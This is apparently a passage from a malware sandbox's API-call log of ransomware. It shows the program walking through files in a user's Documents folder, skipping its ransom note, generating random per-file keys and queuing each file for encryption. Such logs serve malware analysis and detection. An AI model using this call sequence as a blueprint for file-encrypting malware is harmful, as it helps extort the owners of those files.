param_2="%02X" | out: param_1="57") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="4A") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="95") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="1A") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="B3") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="05") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="6E") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="D5") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="5B") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="8B") returned 2 [0124.470] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="22") returned 2 [0124.470] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\s M3dMRVU.pptx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\s M3dMRVU.pptx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\s M3dMRVU.pptx" [0124.471] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.471] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.471] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcee9e180, ftCreationTime.dwHighDateTime=0x1d70129, ftLastAccessTime.dwLowDateTime=0x9dd90e00, ftLastAccessTime.dwHighDateTime=0x1d70286, ftLastWriteTime.dwLowDateTime=0x9dd90e00, ftLastWriteTime.dwHighDateTime=0x1d70286, nFileSizeHigh=0x0, nFileSizeLow=0x9bad, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="SupB6ya3P Jhyc6aL.odt", cAlternateFileName="SUPB6Y~1.ODT")) returned 1 [0124.471] StrStrIW (lpFirst="SupB6ya3P Jhyc6aL.odt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.471] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\SupB6ya3P Jhyc6aL.odt") returned 57 [0124.471] PathFindExtensionW (pszPath="SupB6ya3P Jhyc6aL.odt") returned=".odt" [0124.471] lstrlenW (lpString=".odt") returned 4 [0124.471] PathFindExtensionW (pszPath="SupB6ya3P Jhyc6aL.odt") returned=".odt" [0124.471] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\SupB6ya3P Jhyc6aL.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\supb6ya3p jhyc6al.odt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.476] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=39853) returned 1 [0124.476] GetProcessHeap () returned 0x600000 [0124.476] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.477] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="FE") returned 2 [0124.477] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="1E") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="9A") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="1F") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="AE") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="C4") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="A6") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="AF") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="C4") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="A1") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="85") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="92") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="04") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="FF") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="B8") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="84") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="ED") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="82") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="64") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="0A") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="FD") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="C0") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="CA") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="9A") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="E8") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="5A") returned 2 [0124.477] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="8E") returned 2 [0124.478] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="63") returned 2 [0124.478] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="21") returned 2 [0124.478] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="8E") returned 2 [0124.478] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="BD") returned 2 [0124.478] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="57") returned 2 [0124.478] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\SupB6ya3P Jhyc6aL.odt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\SupB6ya3P Jhyc6aL.odt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\SupB6ya3P Jhyc6aL.odt" [0124.478] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.478] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.481] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e07da20, ftCreationTime.dwHighDateTime=0x1d6bf24, ftLastAccessTime.dwLowDateTime=0x8a8ce4d0, ftLastAccessTime.dwHighDateTime=0x1d6c167, ftLastWriteTime.dwLowDateTime=0x8a8ce4d0, ftLastWriteTime.dwHighDateTime=0x1d6c167, nFileSizeHigh=0x0, nFileSizeLow=0x6051, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="tfqvW r0.xlsx", cAlternateFileName="TFQVWR~1.XLS")) returned 1 [0124.481] StrStrIW (lpFirst="tfqvW r0.xlsx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.481] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\tfqvW r0.xlsx") returned 49 [0124.481] PathFindExtensionW (pszPath="tfqvW r0.xlsx") returned=".xlsx" [0124.481] lstrlenW (lpString=".xlsx") returned 5 [0124.481] PathFindExtensionW (pszPath="tfqvW r0.xlsx") returned=".xlsx" [0124.481] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\tfqvW r0.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\tfqvw r0.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.485] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=24657) returned 1 [0124.485] GetProcessHeap () returned 0x600000 [0124.485] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.487] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="31") returned 2 [0124.487] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="EE") returned 2 [0124.487] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="88") returned 2 [0124.487] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="64") returned 2 [0124.487] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="4C") returned 2 [0124.487] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="94") returned 2 [0124.487] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="6B") returned 2 [0124.487] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="E3") returned 2 [0124.487] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="5D") returned 2 [0124.487] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="9D") returned 2 [0124.487] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="34") returned 2 [0124.487] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="A5") returned 2 [0124.487] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="C2") returned 2 [0124.487] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="0E") returned 2 [0124.487] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="88") returned 2 [0124.487] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="EF") returned 2 [0124.487] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="60") returned 2 [0124.487] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="9F") returned 2 [0124.487] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="91") returned 2 [0124.487] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="8C") returned 2 [0124.488] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="C3") returned 2 [0124.488] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="11") returned 2 [0124.488] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="D5") returned 2 [0124.488] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="52") returned 2 [0124.488] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="07") returned 2 [0124.488] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="F1") returned 2 [0124.488] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="71") returned 2 [0124.488] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="83") returned 2 [0124.488] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="CE") returned 2 [0124.488] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="5A") returned 2 [0124.488] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="6C") returned 2 [0124.488] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="7B") returned 2 [0124.488] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\tfqvW r0.xlsx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\tfqvW r0.xlsx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\tfqvW r0.xlsx" [0124.488] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.488] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.492] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e9058e0, ftCreationTime.dwHighDateTime=0x1d6daa0, ftLastAccessTime.dwLowDateTime=0x50d465e0, ftLastAccessTime.dwHighDateTime=0x1d709d5, ftLastWriteTime.dwLowDateTime=0x50d465e0, ftLastWriteTime.dwHighDateTime=0x1d709d5, nFileSizeHigh=0x0, nFileSizeLow=0xd4c1, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="Tj_7jfgEJii79D.pptx", cAlternateFileName="TJ_7JF~1.PPT")) returned 1 [0124.492] StrStrIW (lpFirst="Tj_7jfgEJii79D.pptx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.492] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Tj_7jfgEJii79D.pptx") returned 55 [0124.492] PathFindExtensionW (pszPath="Tj_7jfgEJii79D.pptx") returned=".pptx" [0124.492] lstrlenW (lpString=".pptx") returned 5 [0124.492] PathFindExtensionW (pszPath="Tj_7jfgEJii79D.pptx") returned=".pptx" [0124.492] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.492] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Tj_7jfgEJii79D.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\tj_7jfgejii79d.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.492] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=54465) returned 1 [0124.493] GetProcessHeap () returned 0x600000 [0124.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.493] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="BC") returned 2 [0124.493] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="00") returned 2 [0124.493] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="D0") returned 2 [0124.493] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="59") returned 2 [0124.493] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="0C") returned 2 [0124.493] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="3A") returned 2 [0124.493] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="FF") returned 2 [0124.493] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="8B") returned 2 [0124.493] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="7B") returned 2 [0124.493] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="6A") returned 2 [0124.493] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="F5") returned 2 [0124.493] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="BF") returned 2 [0124.493] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="84") returned 2 [0124.493] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="7B") returned 2 [0124.493] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="05") returned 2 [0124.493] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="B7") returned 2 [0124.494] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="CA") returned 2 [0124.494] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="31") returned 2 [0124.494] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="2A") returned 2 [0124.494] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="90") returned 2 [0124.494] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="04") returned 2 [0124.494] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="B6") returned 2 [0124.494] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="D7") returned 2 [0124.494] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="94") returned 2 [0124.494] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="38") returned 2 [0124.494] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="B6") returned 2 [0124.494] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="FE") returned 2 [0124.494] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="B6") returned 2 [0124.494] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="78") returned 2 [0124.494] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="2A") returned 2 [0124.494] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="DD") returned 2 [0124.494] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="63") returned 2 [0124.494] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Tj_7jfgEJii79D.pptx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Tj_7jfgEJii79D.pptx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\Tj_7jfgEJii79D.pptx" [0124.494] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.494] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.497] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd762b2d0, ftCreationTime.dwHighDateTime=0x1d709fb, ftLastAccessTime.dwLowDateTime=0x79a1af60, ftLastAccessTime.dwHighDateTime=0x1d70a5b, ftLastWriteTime.dwLowDateTime=0x79a1af60, ftLastWriteTime.dwHighDateTime=0x1d70a5b, nFileSizeHigh=0x0, nFileSizeLow=0x7d7d, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="U65hOzyV7cUnnld.pptx", cAlternateFileName="U65HOZ~1.PPT")) returned 1 [0124.497] StrStrIW (lpFirst="U65hOzyV7cUnnld.pptx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.497] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\U65hOzyV7cUnnld.pptx") returned 56 [0124.497] PathFindExtensionW (pszPath="U65hOzyV7cUnnld.pptx") returned=".pptx" [0124.497] lstrlenW (lpString=".pptx") returned 5 [0124.497] PathFindExtensionW (pszPath="U65hOzyV7cUnnld.pptx") returned=".pptx" [0124.499] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.499] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\U65hOzyV7cUnnld.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\u65hozyv7cunnld.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.500] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=32125) returned 1 [0124.500] GetProcessHeap () returned 0x600000 [0124.500] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.501] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="A7") returned 2 [0124.501] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="E9") returned 2 [0124.501] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="A4") returned 2 [0124.501] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="7A") returned 2 [0124.501] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="E0") returned 2 [0124.501] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="A3") returned 2 [0124.501] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="23") returned 2 [0124.501] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="2B") returned 2 [0124.501] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="15") returned 2 [0124.501] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="2B") returned 2 [0124.501] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="A6") returned 2 [0124.501] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="04") returned 2 [0124.501] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="54") returned 2 [0124.501] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="C4") returned 2 [0124.501] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="3E") returned 2 [0124.501] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="97") returned 2 [0124.502] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="E8") returned 2 [0124.502] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="D3") returned 2 [0124.502] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="EB") returned 2 [0124.502] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="85") returned 2 [0124.502] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="1D") returned 2 [0124.502] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="43") returned 2 [0124.502] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="69") returned 2 [0124.502] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="03") returned 2 [0124.502] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="50") returned 2 [0124.502] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="65") returned 2 [0124.502] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="07") returned 2 [0124.502] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="48") returned 2 [0124.502] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="50") returned 2 [0124.502] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="D1") returned 2 [0124.502] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="95") returned 2 [0124.502] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="0D") returned 2 [0124.502] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\U65hOzyV7cUnnld.pptx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\U65hOzyV7cUnnld.pptx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\U65hOzyV7cUnnld.pptx" [0124.502] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.502] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.506] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f83dae0, ftCreationTime.dwHighDateTime=0x1d6eae5, ftLastAccessTime.dwLowDateTime=0x16b071f0, ftLastAccessTime.dwHighDateTime=0x1d70486, ftLastWriteTime.dwLowDateTime=0x16b071f0, ftLastWriteTime.dwHighDateTime=0x1d70486, nFileSizeHigh=0x0, nFileSizeLow=0x15e1c, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="usHRYk9e1W9-.xlsx", cAlternateFileName="USHRYK~1.XLS")) returned 1 [0124.506] StrStrIW (lpFirst="usHRYk9e1W9-.xlsx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.506] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\usHRYk9e1W9-.xlsx") returned 53 [0124.506] PathFindExtensionW (pszPath="usHRYk9e1W9-.xlsx") returned=".xlsx" [0124.506] lstrlenW (lpString=".xlsx") returned 5 [0124.506] PathFindExtensionW (pszPath="usHRYk9e1W9-.xlsx") returned=".xlsx" [0124.506] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\usHRYk9e1W9-.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ushryk9e1w9-.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.507] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=89628) returned 1 [0124.507] GetProcessHeap () returned 0x600000 [0124.507] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.507] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="DF") returned 2 [0124.507] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="19") returned 2 [0124.507] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="1F") returned 2 [0124.507] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="DC") returned 2 [0124.507] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="E4") returned 2 [0124.507] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="C2") returned 2 [0124.507] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="E8") returned 2 [0124.507] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="62") returned 2 [0124.507] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="B3") returned 2 [0124.507] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="34") returned 2 [0124.507] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="1D") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="2C") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="03") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="F0") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="91") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="7A") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="F4") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="6C") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="84") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="1C") returned 2 [0124.508] wsprintfW (in: 